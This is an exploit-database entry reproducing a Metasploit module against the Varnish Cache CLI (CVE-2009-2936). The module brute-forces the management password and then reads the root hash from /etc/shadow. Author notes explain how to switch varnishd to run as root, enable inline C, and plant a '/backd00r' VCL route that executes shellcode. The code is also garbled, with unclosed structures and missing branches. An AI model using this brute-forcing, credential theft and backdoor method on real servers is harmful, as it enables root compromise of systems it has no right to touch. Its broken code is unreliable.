Varnish Cache CLI Interface Remote Code Execution

EKU-ID: 4450 CVE: 2009-2936 OSVDB-ID: 67670
Author: Patrick Webster Published: 2014-12-22 Verified: Verified



# This module requires Metasploit: http//
# Current source:
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  def initialize
      'Name'           => 'Varnish Cache CLI Interface Bruteforce Utility',
      'Description'    => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
                           list of passwords. This module will also attempt to read the /etc/shadow root password hash
                           if a valid password is found. It is possible to execute code as root with a valid password,
                           however this is not yet implemented in this module.',
      'References'     =>
          [ 'OSVDB', '67670' ],
          [ 'CVE', '2009-2936' ],
          # General
          [ 'URL', '' ],
          [ 'CVE', '1999-0502'] # Weak password
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE
        Opt::RPORT(6082),'PASS_FILE',  [ false, "File containing passwords, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
      ], self.class)
  def run_host(ip)
        res = sock.get_once(-1,3) # detect banner
          if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
            vprint_status("Varnishd CLI detected - authentication required.")
            each_user_pass { |user, pass|
            sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
            res = sock.get_once(-1,3) # grab challenge
            if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
              challenge = $1
              secret = pass + "\n" # newline is needed
              response = challenge + "\n" + secret + challenge + "\n"
              response = Digest::SHA256.hexdigest(response)
              sock.put("auth #{response}\n")
              res = sock.get_once(-1,3)
              if (res =~ /107 \d+/) # 107 auth
                vprint_status("FAILED: #{secret}")
              elsif (res =~ /200 \d+/) # 200 ok
                print_good("GOOD: #{secret}")    
                  :host => rhost,
                  :port => rport,
                  :sname => ('varnishd'),
                  :pass => pass,
                  :proof => "#{res}",
                  :source_type => "user_supplied",
                  :active => true
                sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
                res = sock.get_once(-1,3)
                if (res =~ /root:([\D\S]+):/) # lazy.
                  if ($1[0] == "!")
                    vprint_error("/etc/shadow root uid is disabled.\n")
                    print_good("/etc/shadow root enabled:\nroot:#{$1}:")
                  vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
                vprint_error("Unknown response:\n#{res}\n")
          elsif (res =~ /Varnish Cache CLI 1.0/)
            print_good("Varnishd CLI does not require authentication!")
            vprint_error("Unknown response:\n#{res}\n")
aushack notes:
- varnishd typically runs as root, forked as unpriv.
- '' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:
* quotes must be escaped \"
* \n is a newline
* C{ }C denotes raw C code.
* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
* #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
* example trigger for backdoor:
VCL server:
  vcl.inline foo "vcl 4.0;\nbackend b { . host = \"\";  } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
  vcl.use foo
  telnet target 80
  GET /backd00r HTTP/1.1
(... wait for child to execute debug trap INT3 / shellcode).
CLI protocol notes from website:
The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.
Requests are whitespace separated tokens terminated by a newline (NL) character.
Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (
), (\"), (\%03o) and (\x%02x)
The response consists of a header which can be read as fixed format or ASCII text:
    1-3      %03d      Response code
    4        ' '       Space
    5-12     %8d       Length of body
    13       \n        NL character.
Followed by the number of bytes announced by the header.
The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:
enum cli_status_e {
        CLIS_SYNTAX     = 100,
        CLIS_UNKNOWN    = 101,
        CLIS_UNIMPL     = 102,
        CLIS_TOOFEW     = 104,
        CLIS_TOOMANY    = 105,
        CLIS_PARAM      = 106,
        CLIS_OK         = 200,
        CLIS_CANT       = 300,
        CLIS_COMMS      = 400,
        CLIS_CLOSE      = 500